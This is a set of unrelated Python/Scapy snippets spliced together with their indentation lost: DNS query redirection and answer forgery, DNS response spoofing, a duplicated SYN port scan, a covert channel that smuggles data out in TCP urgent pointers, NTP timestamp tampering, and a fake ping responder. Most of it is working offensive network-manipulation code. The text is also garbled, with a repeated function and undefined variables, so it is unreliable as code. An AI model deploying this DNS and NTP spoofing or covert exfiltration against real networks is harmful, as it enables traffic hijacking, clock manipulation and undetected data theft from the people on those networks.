def rewrite(self, pkt):
ip = IP(pkt)
if ip.haslayer(DNS):
iph = ip.getlayer(IP)
udph = ip.getlayer(UDP)
dns = ip.getlayer(DNS)
if dns.qr == 0: # query
record = {
'dst_ip': iph.dst,
'time': datetime.utcnow()
}
self.records[dns.id] = record
self.logger.debug("rewriting DNS query: %s to %s" % (iph.dst,
self.config['force_nameserver']))
iph.dst = self.config['force_nameserver']
elif dns.qr == 1: # answer
self.logger.debug("found DNS answer: " + dns.summary())
record = self.records.get(dns.id, None)
if record:
self.logger.debug("rewriting DNS answer: %s to %s" % (
iph.src, record['dst_ip']))
iph.src = record['dst_ip']
del self.records[dns.id]
del iph.chksum
del udph.chksum
del iph.len
del udph.len
return str(iph / udph / dns)
def manipulate(self, package):
pkt = IP(package.get_payload())
udp = pkt.getlayer(DNSRR)
qname = pkt[DNSQR].qname
type_id = pkt[DNSQR].qtype
if (type_id == self.reg_a):
new_ip = self.ipv4
elif (type_id == self.reg_aaaa):
new_ip = self.ipv6
try:
# Read dns name
ip = pkt[DNS][2].rdata
# Set new spoofed dns record
pkt[DNS].an = DNSRR(rrname=qname, type=type_id, rdata=new_ip)
# Set 1 record in the response
pkt[DNS].ancount = 1
# Delete checksum and length
del pkt.chksum
del pkt.len
del pkt[UDP].chksum
del pkt[UDP].len
self.log("---------------------------------")
self.log("[*] DNS query:")
self.log("---------------------------------")
self.log("\tName: " + qname + " : " + ip + " -> " + new_ip)
package.set_payload(bytes(pkt))
except Exception as e:
#print(e)
pass
#print(package)
package.accept()
def _syn_scan(host, port, timeout):
pkt = IP(dst=host) / TCP(dport=port,flags="S")
pkt = sr1(pkt, timeout=timeout)
if pkt is None:
return None
return pkt.getlayer(TCP).flags
def _syn_scan(host, port, timeout):
pkt = IP(dst=host) / TCP(dport=port, flags="S")
pkt = sr1(pkt, timeout=timeout)
if pkt is None:
return None
return pkt.getlayer(TCP).flags
def send_data(self, bytestream):
if self.verbose():
print("Exfiltrating " + repr(bytestream.decode('us-ascii')))
packet = IP() / TCP()
packet.dst = self.host()
packet.dport = self.dest_port()
packet.sport = self.source_port()
packet.getlayer(TCP).flags = 0x20 | 0x02 # URG & SYN
packet.urgptr = self.int_for(bytestream)
if self.verbose():
packet.show()
send(packet, verbose=self.verbose())
def manipulate(self, package):
pkt = IP(package.get_payload())
udp = pkt.getlayer(UDP)
del pkt.chksum
del pkt.len
del udp.chksum
del udp.len
if pkt.haslayer(NTP):
ntp = pkt.getlayer(NTP)
else:
ntp = NTP(pkt.load)
# Timestamp to UTC time
self.log("---------------------------------")
self.log("[*] NTP packet:")
self.log("---------------------------------")
ref = self.ntp_system(ntp.ref)
recv = self.ntp_system(ntp.recv)
sent = self.ntp_system(ntp.sent)
# Upgrade the year
new_ref = self.upgrade(ref)
new_recv = self.upgrade(recv)
new_sent = self.upgrade(sent)
# UTC time to timestamp
ntp.recv = self.system_ntp(new_recv)
ntp.sent = self.system_ntp(new_sent)
ntp.ref = self.system_ntp(new_ref)
package.set_payload(bytes(pkt))
#self.log('Packet !')
self.log("Reference Timestamp : ")
self.log("\t" + str(ref) + ' -> ' +
str(datetime.datetime.fromtimestamp(new_ref)))
self.log("Receive Timestamp : ")
self.log("\t" + str(recv) + ' -> ' +
str(datetime.datetime.fromtimestamp(new_recv)))
self.log("Transmit Timestamp : ")
self.log("\t" + str(sent) + ' -> ' +
str(datetime.datetime.fromtimestamp(new_sent)))
package.accept()
import select
import time
from scapy.all import IP, ICMP
from pytun import TunTapDevice, IFF_TAP, IFF_TUN, IFF_NO_PI
tun = TunTapDevice(flags=IFF_TUN | IFF_NO_PI, name="FakePing")
tun.addr = "10.10.10.1"
tun.netmask = '255.255.255.0'
tun.up()
epoll = select.epoll()
epoll.register(tun.fileno(), select.EPOLLIN)
while True:
while epoll.poll(0):
data = tun.read(tun.mtu)
packet = IP(data)
icmp_part = packet.getlayer(ICMP)
if icmp_part is not None:
time.sleep(desire_time)
respacket = IP(src=packet.dst, dst=packet.src, ttl=desire_ttl)
respacket /= ICMP(type=0, seq=icmp_part.seq, id=icmp_part.id)
respacket /= icmp_part.payload
tun.write(bytes(respacket))
packet.show()
respacket.show()
time.sleep(0.01)
